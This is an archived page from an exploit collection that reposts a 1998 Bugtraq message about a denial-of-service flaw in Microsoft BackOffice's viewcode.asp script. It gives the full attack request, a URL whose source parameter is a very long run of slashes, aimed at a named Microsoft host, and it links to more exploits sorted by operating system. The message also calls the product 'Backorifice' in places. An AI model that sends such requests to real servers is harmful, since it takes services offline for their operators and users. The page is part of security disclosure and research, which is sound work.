DOS attack on backoffice viewcode.asp

Summary
Description:You can leave a host running backoffice in a state of not accepting connections by using http://server.com/whetever/viewcode.asp?source=/////////////////<lots more slashes>///
Author:Anonymous
Compromise:DOS attack against web server
Vulnerable Systems:Those running Microsoft Backoffice with viewcode.asp available
Date:14 January 1998
Details


Date: Wed, 14 Jan 1998 18:50:25 -0600
From: Aleph One <aleph1@DFW.DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: MS BackOffice View Source

>From an anonymous contributor:

On a Microsoft Backorifice server you often get the

"View source" - eg on www.backoffice.microsoft.com

Unfortunately it appears there are problems with it. Querying

http://www.backoffice.microsoft.com/general/code/viewcode.asp?source=//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

leaves the host in question not accepting connections. Does anyone know if
this is a generic bug in backorifice or purely a fun feature of microsoft.com

[Anonymous]

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault